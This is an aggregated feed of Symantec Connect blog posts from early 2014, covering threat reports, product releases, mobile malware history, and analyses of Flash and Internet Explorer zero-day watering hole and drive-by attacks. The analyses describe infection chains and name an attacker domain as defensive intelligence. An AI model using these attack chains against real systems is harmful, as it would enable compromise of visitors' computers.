Quantcast
Channel: Symantec Connect - ブログエントリ
Viewing all 5094 articles
Browse latest View live

Symantec Intelligence Report: January 2014

0
0

Welcome to the January edition of the Symantec Intelligence report. Symantec Intelligence aims to provide the latest analysis of cyber security threats, trends, and insights concerning malware, spam, and other potentially harmful business risks.

A number of large data breaches were reported during the month of January. The largest new data breach included the exposure of 105.8 million identities in South Korea. (It’s worth noting that many individuals in the country had more than one account exposed in this breach.) Another large data breach, previously reported as including 40 million identities, has since had its numbers adjusted upwards and is now estimated at 110 million identities exposed. These two breaches contribute significantly in bringing the total number of identities exposed to over 500 million for the last twelve months.

Targeted attacks are up to their highest level since August of last year, after what appears to be average-to-low attack numbers over the last four months. Manufacturing is the most targeted industry, making up 21.3 percent of attacks. The non-traditional services category, which includes hospitality, recreation, and repair, is a close second at 20.6 percent.

The number of vulnerabilities reported is also up in January after lower numbers reported in November and December of last year. However, at 555 vulnerabilities, this number is still well below October, which reported a high of 663 for the month.

In other news, spam and phishing rates are down slightly in January, while email virus rates are at their lowest levels since October of last year.

We hope you enjoy the January Symantec Intelligence Report. You can download your copy here.


Import tapes into tape library using netbackup 6.5.6

0
0
Import tapes into the tape library using netbackup 6.5.6

Hi Gurus,  I wil need to perform a restore on a different netbakcup environment and restore the data there.

How can I import the tapes to the tape library? Do I need to check them into the library as regular tapes and then import them into the catalog.

Thanks for your imput.

 

Top 5 Reasons Companies Need Mobile Application Management

0
0

Cheryl Tang, Senior Product Manager, Symantec Corp. illustrates why Mobile Application Management is vital to securing the future of "anywhere" business.

Changing The Shape Of Security For Business In The Future

0
0

How will enterprise security change in the next several years? With so many new devices, attacks and vulnerabilities, how will we keep up in the future?

Latest Symantec Endpoint Protection Released 12.1.4a and 11.0.7.4a

0
0

Hello,

Symantec Endpoint Protection 12.1.4a and 11.0.7.4a has been released on Feb 13' 2014.

The Builds version is: 12.1.4023.4080

SEP released version details are available here: https://www-secure.symantec.com/connect/articles/what-are-symantec-endpoint-protection-sep-versions-released-officially

Download here Symantec Endpoint Protection 12.1.4a and 11.0.7.4a :

https://symantec.flexnetoperations.com/control/symc/registeranonymouslicensetoken

SEP 12.1 Enterprise Edition:

12.4a_1.jpg

For Small Business Customer 12.1:

SBE RU4a_0.jpg

SEP 11 RU7 MP4a:

RU7 MP4a_0.jpg

This release is specific to the SEPM.  Only Part1.exe and SEPM.exe is available to download.

Part2.exe is not available to download.

Even in the Part1.exe, SEPM is available with the latest version i.e. 12.1.4023.4080 but SEP client packages are available with 12.1.4013.4013 (RU4) packages only.

This update to Symantec Endpoint Protection Manager contains remediation for the vulnerabilities listed in Symantec Security Response Advisory SYM14-004. This update applies only to the manager, not to clients, and is designed to update any version of Symantec Endpoint Protection Manager. Symantec recommends that all Symantec Endpoint Protection and Network Access Control customers upgrade to this release of Symantec Endpoint Protection Manager.
   
For detailed information about this release, read the Knowledge Base article SYM14-004 Symantec Endpoint Protection Management Vulnerabilities

Supported upgrade path:

SEPM 11 RU7 MP4a can be installed over any previous version of SEPM 11, and SEPM 12.1 RU4a can be installed over any previous version of SEPM 11 or 12.1, including SEPM 11 RU7 MP4a.

This release is specific to Endpoint Protection Manager & no updates are available for SEP clients.

Fix notes & fix ids are not available in the following KB's.

http://www.symantec.com/docs/TECH103087

http://www.symantec.com/docs/TECH163829

Register here to receive product alert notifications:

http://www.symantec.com/docs/TECH105781

Go through Symantec official blog as well: https://www-secure.symantec.com/connect/blogs/security-advisory-symantec-endpoint-protection-management-vulnerabi

 

The Very Best Enterprise Vault Outlook Add-in Version

0
0

A question which is often asked on the Connect Forums is:

"Which is the best Enterprise Vault Outlook Add-in Version?"

 

That's actually an interesting question. For me the answer lies in the 'big change' that took place in Enterprise Vault 10.0.2.  Taken from the release notes we see:

Single Outlook Add-In installer for all supported languages [Ref 13446, 13729]

In Enterprise Vault 10.0.1 and earlier, there was a separate Outlook Add-In installer for each language that the Outlook Add-In supported.

In Enterprise Vault 10.0.2 and later, there is a single installer for all supported languages. The installer kit (Symantec Enterprise Vault Outlook Add-in.msi) is in the folder Symantec Enterprise Vault\Outlook Add-In on the Enterprise Vault distribution media.

The display language that the Outlook Add-In uses is based on the Microsoft Office and Windows language settings. The Outlook Add-In uses the Office language, if it is supported. Otherwise, it uses the Windows language. If the Outlook Add-In does not support either language, it uses English.

It is possible to configure Office to use one language for the user interface and another language for the help. In this case, the Outlook Add-In considers each of these languages separately and, if necessary, uses the Windows language or English.

So for me any version of the Outlook Add-in 10.0.2 or higher is a good one to pick, because it's much simpler in terms of deployment and manageability.

 

New Flash Zero-Day Linked to Yet More Watering Hole Attacks

0
0

Watering hole attacks using zero-day vulnerabilities are becoming more common. Last week we announced an Internet Explorer 10 zero-day being used in a watering hole attack and today, just one week later we have an Adobe Flash zero-day, Adobe Flash Player and AIR CVE-2014-0502 Remote Code Execution Vulnerability (CVE-2014-0502), also being used in a watering hole attack. This new attack has been dubbed “Operation GreedyWonk” in various media and is reported to be targeting the websites of three non-profit institutions. Symantec telemetry shows even more sites being targeted in this watering hole attack using this new zero-day.
 

adobe-zero-day.png

Figure 1. Watering hole attack using Adobe Flash 0-day
 

Anatomy of the attack

This attack technique is known as a watering hole attack. In this case the target visits a compromised website that contains an IFrame inserted by the attackers in order to redirect the target to another website (giftserv.hopto.org). This new site loads a malicious index.php file (Trojan.Malscript) which checks whether the victim is running a 32-bit or 64-bit system. Depending on the results, a malicious index.html file (also Trojan.Malscript) and additional components are also downloaded from either the 32-bit or 64-bit folders hosted on the attacker’s server. The malicious index.html file then loads the cc.swf Adobe Flash file (Trojan.Swifi) containing the zero-day. Once exploited, a logo.gif image file is downloaded containing encrypted shellcode which downloads and executes the malicious server.exe (Backdoor.Jolob) payload.
 

How can I prevent and mitigate against this attack?

Symantec recommends users update their Adobe product installations to the latest versions to address this critical vulnerability. Details of how to upgrade software are available in an Adobe Security Bulletin.

Symantec customers are protected from this zero-day attack with the following detections:

Antivirus

Intrusion Prevention Signatures

As always, we also advise customers to use the latest Symantec technologies and incorporate the latest Symantec consumer and enterprise solutions to best protect against attacks of any kind.
 

Watering hole attacks remain popular

This latest watering hole attack demonstrates that it remains a popular technique for attackers to target individuals of interest. The use of yet another zero-day indicates the arsenal available to attackers shows no signs of depletion. Multiple websites have been identified using this Adobe Flash zero-day, all with different payloads being delivered. This may be the result of this particular zero-day being sold to a number of different attackers, or possibly that it was used by a single attacker in multiple campaigns. Symantec continues to investigate this attack to ensure that the best possible protection is in place.
 

watering-hole-attacks.png

Figure 2. Anatomy of a watering hole attack

What’s New for Our Partners? A Redesigned Symantec Partner Program Coming Soon

0
0

By Garrett Jones, Vice President of Global Channel Operations

I had a great time at last week’s Symantec Partner Engage event in Budapest visiting with more than 300 of our top partners from across the EMEA region.  In addition to sharing more about our company’s strategy and vision, it was also exciting to share the details around our redesigned Partner Program framework.  Built on Symantec’s Global Channel Strategy announced in November, the new Partner Program will better support the way our partners do business by fostering stronger partnerships that enable growth and delivering differentiated value to our customers. 

As we consider the breadth of our portfolio, we need partners who are focused on each type of customer across all levels of complexity.  We need partners that understand and can solve the needs of an SMB just as much as we need partners with deep relationships in the enterprise space to help with more complex solutions. The new Partner Program addresses these needs and is designed to reward for growth in areas where partners are most capable.

As a part of the redesign, we are introducing Symantec Competencies, an enablement framework that builds upon partners’ existing capabilities to deliver better customer experience through deeper expertise in areas of focus that are aligned to our solutions.  How does this work? Partners will build the capabilities required to sell and implement our solutions, and once partners have obtained the capabilities for a given competency, many of the benefits defined in the program become available.  As partners meet certain performance standards, the benefits increase, and partners will earn very compelling rewards for growing their business and delivering exceptional value to customers.  The competencies are the foundation of the program, and they underpin the program design principals of being customer focused, performance based and more rewarding for our most committed partners.

What else is different about the redesigned Partner Program?  With the new Partner Program, we will spend more on financial benefits for the channel than ever before.  The program design concentrates the investments more selectively with our top performing partners. We’ve enhanced our Opportunity Registration program and added a performance rebate for growth.  We will also offer development funds so we can invest in our partners as they have invested in us.  

We’re also enhancing our non-financial benefits to help our partners grow their business and advance customers through the sales cycle.  One of the new benefits will be access to the same market intelligence that we use for internal business planning, so we can align our execution with our partners on the same market data and grow together.  We will also increase our consulting and technical support benefits and offer more online learning opportunities.

Following the EMEA Partner Engage event, Roger Bär, chief executive officer of Comsoft, shared his enthusiasm with us by stating, “We have maintained a close partnership with Symantec for many years. With their forthcoming redesigned Partner Program, we look forward to the many benefits that will help us secure more business opportunities and position us for success.”

Additionally, Savitha Bhaskar, general manager of Condo Protego shared, “Symantec’s new competency framework will help to distinguish us against our competitors as it reflects a clear understanding of our ability to deliver value and satisfaction.”

We will share more details later this year when we get closer to the official launch.  We are being very thoughtful with regards to how partners will transition to the new program and how we recognize our partners’ current investments. As such, we’ve designed a transition period in which current membership status and associated benefits will be maintained throughout the transition.  

We built this program by collaborating with partners and adjusting our approach based on the feedback along the way.  Our approach will continue to be iterative and evolve to ensure the program provides value and meets the needs and expectations of our partners. Look for more information in the coming months.  

 

 


Project updates as February draws to a close

0
0

As February is drawing to a close I thought I'd review the progress made this month on a few projects and report on some checks to be done.

First, let's look back at what I set to do in February [1]. I am almost there :D:

  • A wrap-up for aila2-version 1 containing a couple of installation files and the toolkit in a single zip --> _DONE_
  • A gauge control for Patch Compliance Trending to provide global compliance status at a glance --> _DONE_
  • A toolkit to link multiple Patch Trending sites to provide a global view for large environments <-- _NOT_DONE_
  • A Managed Delivery execution reporting toolkit, to display software execution over time --> _DONE_

I am also still working on the aila2 new features [2], with http return code stats done, hit count per IP Address done (not in the original plan, but needed). I still need to make good on the filtering additions, and I would like to add detailed account for TaskManagement and InventoryRuleManagement.

Finally, I have add a few messages exchanged with phoward74 who's having some issues using Patch Trending on 7.5.

The tool in itself is working fine from the CLI (using an elevated prompt) however it doesn't manage to find the trending table when running from the server via task or via the agent itself!

So I need to verify if the trending toolkit can work for 7.5 (the tool in itself is okay, but the SMP integrations have to be validated again).

[1] A note on things to come

[2] {CWoC} aila2-version1 sources files

[3] Adding Patch Trending to Your Symantec Management Platform Step by Step Guide

Proposed NetBackup Vision Breakout Sessions

0
0

Trying to figure out which breakout session for NetBackup sounds most interesting to other NetBackup users.  Please indicate by answering the poll on the right. Thank you!

The Tenth Anniversary of Mobile Malware

0
0
mwc_10years_tube_map_infographic.png
Figure. A brief history of mobile malware
 
2014 marks the tenth anniversary of mobile malware. It all began in 2004, when the first variant of SymbOS.Cabir was submitted to security researchers. The analysis revealed that this worm targeted Symbian OS, which was a very popular mobile operating system at the time. Infected phones would search for nearby Bluetooth devices that had activated discovery mode and then the worm would try to push itself onto them. The user had to manually accept the file transfer and also had to agree to the worm’s installation before the malware could infect the device. This limited the spread of the worm, as the victim had to be in close proximity to devices and needed to interact with the worm. But this was only the beginning. Several variants of Cabir appeared in the wild with different modifications. Some variants stole data, such as phonebook details, and other samples acted as a classic virus and infected local files. 
 
A few months later, a cracked version of a game called Mosquito appeared on the Internet. Along with the popular game, the package contained Trojan.Mos, which would send premium text messages in the background. This was the first widely seen case of mobile malware with a focus on monetary profit. Today, the same tactic is used on hundreds of Trojanized Android games, which will send expensive text messages after installation. Soon after Mosquito, the first versions of Skull appeared. The threat was named after its main payload, as the malware replaced the icons of most applications with an image of a skull. It also replaced system and application files with garbage, disabling their functionality and rendering the phone nearly unusable. Luckily at that time, ransomware was not yet popular, or else we probably would have seen the malware trying to hold the user’s data or the mobile device itself hostage. This changed in 2013 when we saw the first ransomware samples hitting mobile devices. These threats focus more on holding the phone hostage instead of the data, as frequent device synchronization and automatic data uploads to the cloud provide a better backup utilization for the users.  
 
In 2005, SymbOS.CommWarrior.A entered the scene. It extended the propagation vector to include sending MMS messages to various numbers in the contacts book. This malware was very successful and CommWarrior variants have been floating around mobile phone networks for years. In 2006, Trojan.RedBrowser.A extended threats that send premium text messages to other operating systems. This was the first Trojan for J2ME that could infect different mobile phone platforms.
 
Within a year, mobile devices had to deal with malware that was similar to established malware on desktop computers, including worms, data-stealing and profit-making Trojans, and viruses that infect other files. If this wasn’t enough, the rise of adware and spyware did not bypass mobile phones. The commercial Spyware.FlyxiSpy, which was released in 2006, was very successful at monitoring all of the compromised mobile device’s activity. The malware was advertised as the best solution for people who wanted to spy on their spouses. Similar threats followed and evolved further, allowing the user’s every step to be tracked.
 
With many online banks moving to out-of-band SMS transaction verification methods, the criminals had to follow as well. As a result, in 2010, attackers introduced SymbOS.ZeusMitmo, a threat that was capable of forwarding bank account transaction text messages from the compromised mobile device to the attackers. This allowed attackers to continue to commit online banking fraud. The idea was so successful that soon, mobile malware targeting online banking services appeared for all the major phone operating systems except iOS.
 
When Android became the biggest mobile phone platform in 2011, malware authors began to take notice. The attackers’ distribution vector of choice is through Trojanized applications and they use some social engineering techniques to make them more palatable. For example, Android.Geinimi was an early, successful bot for mobile devices disguised as a useful app. Mobile botnets have since become popular and are often used for click-fraud and premium text message scams.
 
Android.Rootcager arrived in the same year and was the first Android threat to use an exploit to elevate its privileges. This also marks one of the few differences between mobile malware and desktop computer threats. On Windows computers, we often see malware that uses an exploit to install itself on the compromised computer. In fact, drive-by-download infections from malicious websites have become the top infection vector. However, on mobile phones, drive-by-downloads happen very rarely. Most of the time, users still have to be tricked into installing the application themselves. It’s not that there are no vulnerabilities for mobile operating systems — there are actually quite a few, it’s just that attackers have not found it necessary to use them yet. In 2010, an iPhone jailbreak website demonstrated how this form of attack could work. The site took advantage of a PDF font-parsing vulnerability to install custom software on the fly. Since then, all mobile phone operating systems have upgraded their security, making it harder for malware to misuse vulnerabilities.
 
In the last two years, we have seen major growth from Trojans and adware targeting mobile devices, mainly focusing on Android phones. Even targeted attacks now make use of mobile threats for spying purposes. Considering this boom, mobile malware has become a real threat that needs greater attention because it isn’t over yet. In fact, we are likely to see the next evolution of mobile threats soon, especially as mobile phones become identification tokens and payment solutions in the future. 
 
Symantec recommends that users remain vigilant when installing applications from any unknown sources. Use strong passwords to protect your device and services. Symantec offers various security products for mobile devices that block these threats and we are constantly working on delivering the next level of protection.

これからのモバイルマルウェア

0
0

figure1_17.png

今年の Mobile World Congress は、2 月 24 日から 27 日の会期で開催されています。スマートフォンやタブレットの最新技術が一堂に会し、それが今後 1 年のうちに私たちの前に姿を現すことでしょう。しかし、モバイルデバイスのメーカーやアプリ開発者が毎年技術を競い合うように、マルウェアの作成者も腕を磨いています。シマンテックは 2013 年、Android モバイルオペレーティングシステムを標的としたマルウェアの新しい亜種を 1 カ月当たり平均 272 種類、新しいマルウェアグループを平均 5 つ発見しました。こうした脅威が、さまざまな手口でモバイルデバイスを標的にしており、個人情報と銀行口座やクレジットカードなどの情報を盗み出すほか、ユーザーを追跡する、プレミアム SMS メッセージを送信する、執拗なアドウェアを表示するなどの攻撃を試みます。これまでに確認された顕著な脅威が先駆けとなって、新しいタイプのモバイルマルウェアが出現するかもしれません。

さらに大胆に財布を狙う Android マルウェア
オンラインバンキングやショッピングにスマートフォンとタブレットを使うユーザーは増え続けています。PewResearch が行った最近の調査によると、米国の成人のうちオンラインバンキングを利用しているのは 51% で、オンラインバンキングに携帯電話を使っている率も 35% に達しています。若い世代ほどモバイルバンキングの利用率が高い傾向があるので、時間が経てばさらに普及率は高くなるでしょう。

オンラインバンキング用のアプリと併せて、モバイルデバイスは 2要素認証(2FA)プロセスにも対応しています。ユーザーが PC 上でオンラインバンクの口座にログインしようとすると、モバイルデバイスにコードが送信され、そのコードをオンラインバンキングサイトに入力して初めてそのユーザーの ID が確認される仕組みです。

この方式を理解している攻撃者によって、2FA のコードを盗み出す Android マルウェアが開発されており、Android.HesperbotAndroid.Perkelといったマルウェアは、2FA コードの記載された SMS メッセージを傍受して、攻撃者に直接送信します。オンラインバンキングに関する他の利用者情報も盗み出し、PC ベースの他のマルウェアを組み合わせて被害者のアカウントに侵入します。

モバイルウォレットという概念が普及していることから、この手のマルウェアは今後数年で増加する恐れがあります。実店舗の買い物にモバイルデバイスを使うという考え方はまだ主流ではありませんが、攻撃者がこれに目を付けるのも時間の問題でしょう。

ステルス性の強化 - Android ブートキット
ブートキットは、主に Windows コンピュータを標的にした高度な脅威で使われています。オペレーティングシステムの奥深くで活動し、通常はマスターブートレコードなどコンピュータの起動コードに感染するため、オペレーティングシステム自体の起動より前にマルウェアを実行することが可能です。このような形の脅威を攻撃者が利用すれば、長期間にわたって侵入先のコンピュータに潜伏し、特定のプロセスを検出から逃れるようにすることができます。その結果、脅威のコンポーネントはルートキットやその他のステルス機能によって守られるため、ブートキットは対処が難しい厄介な存在になりかねません。シマンテックが提供している Symantec Power Eraserノートン パワーイレイサーノートン ブータブルリカバリツールを使って、この手の脅威をコンピュータから除去することができます。

最近見つかったブートキット(Android.Gooboot として検出されます)は、Android デバイスを狙うことがわかっています。Android.Gooboot は Android デバイスのブートパーティションとブートスクリプトを書き換えて、オペレーティングシステムの起動中に起動することができます。これは特に除去が難しいブートキットですが、そもそも感染させるためには攻撃者は物理的にデバイスに触れなければなりません。また、Android.Gooboot は何の悪用コードも伴わず、権限を昇格する機能も持っていません。とは言え、攻撃者がスマートフォンへの感染を試みる手口はますます大胆になっているので、これが Android マルウェアを取り巻く状況について今後の傾向を示しているとは言えそうです。現時点では、ルート権限を取得した携帯電話を購入する際は警戒してください。

モバイルデバイスに侵入する新たな経路
Android マルウェアはユーザーを欺いて Android マーケットから悪質なアプリをインストールさせるのが常套手段です。しかし、アプリの審査が厳密になりつつあるため、攻撃者が悪質なアプリを Android マーケットに送り出すのは以前より難しくなってきました。その代わりに攻撃者は、PC を経由して Android デバイスに侵入することを試み始めており、そこからハイブリッド型の脅威も生まれています。

シマンテックが Trojan.Droidpakとして検出する最近の脅威は、まず Windows コンピュータに侵入し、最終的に悪質な Android アプリケーションパッケージ(APK)を侵入先のコンピュータにダウンロードします。ユーザーがこのコンピュータに Android デバイスを接続すると、トロイの木馬が悪質な APK(Android.Fakebank.Bとして検出されます)を Android デバイスにインストールしようとします。インストールに成功すると、APK は韓国の特定のオンラインバンキングアプリを探して、悪質なバージョンをインストールさせるようユーザーを誘導しようとします。

この脅威を回避するために、信頼できない PC にはモバイルデバイスを接続しないよう注意して、また PC にもモバイルデバイスにもセキュリティソフトウェアを必ずインストールしてください。

もちろん、ハイブリッド型の脅威で狙われる経路は PC ばかりではありません。モノのインターネットが現実のものとなりつつある今、モバイルデバイスを利用してホームオートメーションシステムに、あるいはその逆方向に感染を試みる脅威が登場すると思われます。

増え続けるモバイルマルウェア
モバイルマルウェアは進化を続けています。Windows マルウェアの歴史を手掛かりにすることも多く、最新の技術動向にも常に敏感です。Android マルウェアの作成者の技量が向上していることは、ブートキットのような高度な手口が登場していることからも明らかです。PC を標的としたサイバー犯罪と同様、ほとんどの攻撃者の動機は金銭の詐取です。モバイル決済技術が普及していけば、モバイルデバイスは攻撃者にとってさらに魅力的な標的となるでしょう。パーソナルコンピューティングのためにモバイルデバイスへの依存度が高くなればなるほど、モバイルデバイスの保護は不可欠になります。ノートン モバイルセキュリティなど、定評のあるセキュリティソフトウェアを使って、さまざまな脅威からモバイルデバイスを保護してください。

 

* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/jaにアクセスしてください。

Apple's SSL bug in iOS and OS X - CVE-2014-1266

0
0

Apple released a security update of iOS 7.0.6 - details as follows:

---------

Available for: iPhone 4 and later, iPod touch (5th generation), iPad 2 and later

Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS

Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.

CVE-ID-> CVE-2014-1266:

The SSLVerifySignedServerKeyExchange function in libsecurity_ssl/lib/sslKeyExchange.c in the Secure Transport feature in the Data Security component in Apple iOS 6.x before 6.1.6 and 7.x before 7.0.6, Apple TV 6.x before 6.0.2, and Apple OS X 10.9.x before 10.9.2 does not check the signature in a TLS Server Key Exchange message, which allows man-in-the-middle attackers to spoof SSL servers by using an arbitrary private key for the signing step or omitting the signing step.

Source: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1266

-----------

The released security update fixes a bug with SSL implementation on iOS that would allow man-in-the-middle attacks to intercept the SSL data. Affected versions include iOS up to version 7.0.5 and OS X before 10.9.2. Apple already issued a fix for iOS in version 7.0.6. and according to Apple similar fix for OS X should be expected shortly.

 

Current recommendations for iOS version 7.0.5. or older:

- update to version 7.0.6 immediately (perform the update over trusted connection)

 

Current recommendations for OS X version older than 10.9.2 include:

- use alternate browser - currently Firefox and Chrome have been deemed safe from this bug as they are using own SSL/TLS libraries

- avoid using public and unsecured networks (especially WiFi networks)

- as soon as Apple release the fix for OS X apply the patch on the affected versions of software to remediate

- AV or IPS protection are not feasible for this issue

 

References:

About the security content of iOS 7.0.6
http://support.apple.com/kb/HT6147

Anatomy of a "goto fail" - Apple's SSL bug explained, plus an unofficial patch for OS X!
http://nakedsecurity.sophos.com/2014/02/24/anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch/

Apple security update fixes iOS vulnerability
http://news.cnet.com/8301-13579_3-57619299-37/apple-security-update-fixes-ios-vulnerability/

Urgent iPhone and iPad security update, Mac OS X pending
http://www.welivesecurity.com/2014/02/22/urgent-iphone-and-ipad-security-update-mac-os-x-pending

Protect your Mac from SSL bug
http://reviews.cnet.com/8301-13727_7-57619382-263/protect-your-mac-from-ssl-bug/

 

Internet Explorer 10 Zero-Day Vulnerability Exploited in Widespread Drive-by Downloads

0
0

Earlier this month we blogged about a new Internet Explorer 10 zero-day vulnerability that was targeted in a recent watering hole attack. The attackers took advantage of a previously undiscovered zero-day flaw known as the Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2014-0322). At the time, the attackers delivered the exploit code for the zero-day vulnerability through compromised sites, intending to target a limited audience. Since then, we have continued to closely monitor attacks focusing on CVE-2014-0322. We’ve observed trends suggesting that attacks targeting this vulnerability are no longer confined to advanced persistent threats (APT) — the zero-day attacks are expanding to attack average Internet users as well. We refer to these attacks as drive-by downloads. This is not a surprising result, as the vulnerability’s exploit code received a lot of exposure, allowing anyone to acquire the code and re-use it for their own purposes.

Our internal telemetry shows a big uptick in attempted zero-day attacks. The attacks started to increase dramatically from February 22, targeting users in many parts of the world.  Our telemetry shows both targeted attacks and drive-by downloads in the mix.

IE 10 zero day 1.png

Figure 1. Attacks targeting CVE-2014-0322 around the world

Users visiting Japanese sites have particularly been targeted.  This is mainly because multiple sites were compromised to host the drive-by download. The following sites were compromised in these attacks.

  • A community site for mountain hikers
  • An adult dating service site
  • A website promoting language education
  • A website providing financial market information
  • An online shopping site
  • A website of a Japanese tour provider

We believe that the same attacker undertook the majority of the attacks, based on the file components used.

IE 10 zero day 2 edit.png

Figure 2. Computers targeted with CVE-2014-0322 exploit code by region

These websites either were modified to host the exploit code for the Internet Explorer zero-day vulnerability or were updated with the insertion of an iframe that redirects the browser to another compromised site hosting the exploit code. If the attack is successful, the exploit drops a banking Trojan that steals login details from certain banks. Symantec detects this threat as Infostealer.Bankeiya.

IE 10 zero day 3.png

Figure 3. Fake login screen for Mizuho Bank asking for a pin number

How to stay protected from the attacks

Microsoft has yet to provide a security update to patch the affected vulnerability. However, the company has offered the following solutions to help users protect their computers from exploits that take advantage of this vulnerability:

Symantec also encourages users to apply all relevant patches when they are available. Symantec protects customers against this attack with the following detections:

Antivirus

Intrusion Prevention Signatures

We will likely to continue to see an uptick in attacks exploiting this vulnerability, so we urge everyone to take action immediately.

Hot Off The Press - Office 2013 Service Pack 1

0
0

Useful information for all Enterprise Vault administrators out there is that Microsoft have released Office 2013 Service Pack 1:

http://www.microsoft.com/en-us/download/details.aspx?id=42017, 32 bit

http://www.microsoft.com/en-us/download/details.aspx?id=42006, 64 bit

The updates are a whopping 643 Mb and 774 Mb respectively.

Why is this important to Enterprise Vault Administrators?  Well, it is something that can of course be tested with the Enterprise Vault Outlook Add-in, but 'we' should all wait until Symantec have given the 'nod of approval' before going ahead and installing it in a production environment.  There might be as yet unforeseen issues with the Enterprise Vault Outlook Add-in and the service pack.

Interested to know though if anyone has any feedback, please let me know.


Vision 2014 Conference Topics for NetBackup

0
0
Tell us what interests you!

Greetings NetBackup professionals! The NetBackup product team is actively planning for our biggest Vision conference ever. In addition to participating in over 100 training sessions and hand-on labs, conference attendees will be able to hear the latest on the future direction of NetBackup, connect with the thought leaders and subject matter experts who drive our data protection technologies, and network with their peers to learn how they are using NetBackup to protect their information.

We’d like your help to make sure the educational experience is exactly what you’re looking for. We’ve put together a quick survey of possible NetBackup topics we may cover at the conference. Please share your opinions with us and let us know which of these topics interests you:

Click here to fill out our Vision NetBackup topic survey

 

Symantec Vision 2014 Conference Details:

Where: Caesars Palace, Las Vegas
When: Monday, May 5 through Thursday, May 8
Register: http://www.symantec.com/vision/

Catalog backups to lower version Media Servers - Not Always any Error!

0
0
7.5 Master Catalog backed up to a 6.x Media Server - A word of warning!

My experience of an easy oversight during a staged upgrade and a word of warning for users whose Catalog backup may look OK but may be of no use!

How to Protect Against Small Business Tax Scams

0
0

Over the next few weeks, 23 million small businesses will file their taxes.[1]  While many of these companies are investing time and money to identify their 2013 tax deductions,  most don’t realize that small businesses like theirs are being identified as online targets—an oversight that could result in devastating financial loss for their business.  And at tax time, small businesses are especially lucrative targets for cybercriminals, particularly in the BYOD era where work and personal data is accessed on the same device, including bank records and sensitive emails.

In today’s interconnected world, organized crime syndicates utilize a variety of malicious tax-themed scams designed to lure victims and steal important financial information. For example, Symantec has detected a rise in tax-season-specific ‘phishing’ scams—referring to the attempted theft of sensitive information such as usernames, passwords, or credit card details by impersonating a trustworthy source, such as a bank.

Cybercriminals are also sending fake emails this season with HTML attachments that, when opened, infiltrate the user’s PC and capture personal data before sending it to an attacker-controlled server. This can be damaging to small business owners and their employees, as both business and personal information is then compromised and vulnerable. Below is a screenshot of one such HTML phishing scam, impersonating the HMRC (“her majesty’s revenue and customs,” the UK tax office):

HMRC_0.png

 

 

We have also seen a variant of famed financial Trojan Zeus– known as Citadel – being used to steal financial credentials by leveraging trusted company names, such as TurboTax, to target victims:

TurboTax.png

 

And, while we haven’t yet seen malicious Ransomware threats, like Cryptolocker, used in these campaigns, we strongly encourage small business owners and employees to be especially cautious when opening any email messages sent from an unknown or questionable source throughout the tax season.  Once Cryptolocker gains access to the system, important files on the device become encrypted, and only the cybercriminals can decrypt them. The data is then held for “ransom” with the criminal demanding payment in a digital, untraceable currency.  Sadly, whether the ransom is paid or not, the victimized company rarely regains access to their files.

But all of these targeted attacks and phishing scams can all be avoided! To prevent cybercriminals from attacking your small business this tax season, Symantec offers the following tips:

Quick tips to help you protect yourself and your business:

  • Make sure you have internet security software. Security software is the first line of defense you need between cybercriminals and the sensitive/financial data you keep on your computer, in your network, or in the cloud.  And traditional antivirus software is no longer enough. Shop security products.
  • Internet security software alone is not enough; you also need to back up your important data. Having a digital copy of your critical business information ensures that you can recover your critical data in the event of an attack or a system crash.  Shop backup and recovery products.
  • Utilize encryption for sensitive data. If you plan to use a wireless network to electronically file your taxes, be sure to use a secure Internet connection – never use public wireless hotspots. Shop encryption products.
  • Be suspicious! Scammers are quite good at making emails and links look legitimate, and the most lucrative tax return schemes are based on identity theft, so ensure your email is truly sent from the advertised source before opening it. Also, always be apprehensive about providing financial information, such as your Social Security Number (SSN), bank or credit card account numbers, or security-related information like your mother's maiden name, online—look for trust identifications like the Norton Secured Checkmark before submitting.
  • Require Password Protection. Password protect directories and accounts to ensure your data is defended from outside threats. Choose passwords with care—don't select a recognizable word, or something obvious, such as "password" or your name. Make your passwords as long and as complex as you can.
  • Always log out completely. Whether you're on a tax site, an online store, or any site in which you've entered personal information, remember one step: log out when you're done. If you don't, you're exposing identity information to cyber thieves. This is especially true if you're using a public computer or a shared work computer.
  • The IRS will never email you. Ever. If you get an email from the IRS or EFTPS (Electronic Federal Tax Payment System), don't respond. Instead, forward it to phishing@irs.gov. You should also know that the IRS will never call you by phone. Email threats about consequences for failing to respond or blocking access to your funds are always fraudulent.
  • The postal system is not the safest way to receive checks from the IRS. Criminals look for unlocked mailboxes at tax time to steal tax return envelopes. Always have your refund directly deposited into your bank account to help ensure your money reaches you.

For more information on small business security products, visit: http://www.symantec.com/small-business and follow Symantec on Twitter, at @Symantec.

 

ドライブバイダウンロード攻撃にも悪用され始めた Internet Explorer 10 のゼロデイ脆弱性

0
0

先週のブログで、最近の水飲み場型攻撃で Internet Explorer 10 の新しいゼロデイ脆弱性が悪用されていることをお伝えしました。攻撃者が悪用したのは、これまで見つかっていなかったゼロデイ脆弱性、「Microsoft Internet Explorer の解放後使用によるリモートコード実行の脆弱性」(CVE-2014-0322)です。先週の時点では、攻撃者は特定のユーザーだけを狙って、侵入先のサイトを通じてゼロデイ脆弱性に対する悪用コードを送信していました。その後も CVE-2014-0322 を狙った攻撃を注意深く監視を続けた結果、シマンテックは、この脆弱性を利用した攻撃が APT(Advanced Persistent Threat)に限らなくなっている傾向を確認しています。このゼロデイ攻撃の標的が一般のインターネットユーザーにも拡大しつつあるということです。シマンテックはこの攻撃をドライブバイダウンロード型と見なしていますが、これも驚くほどのことではありません。脆弱性の悪用コードは広く公開されているため、誰でもコードを手に入れて独自の目的に再利用できてしまうからです。

シマンテックの遠隔測定によると、ゼロデイ攻撃の試みは大きく増加しており、2 月 22 日以降、多くの国や地域のユーザーを標的として劇的に増加しています。また、遠隔測定では、標的型攻撃とドライブバイダウンロードの両方が混在していることがわかります。

IE 10 zero day 1.png

図 1. CVE-2014-0633 を悪用する攻撃の分布図

特に、日本のサイトにアクセスするユーザーが標的となっています。これは、複数のサイトが侵害され、ドライブバイダウンロードのホストとして利用されていることが主な原因です。今回の攻撃では、以下のサイトが侵入を受けています。

  • 登山者を対象としたコミュニティサイト
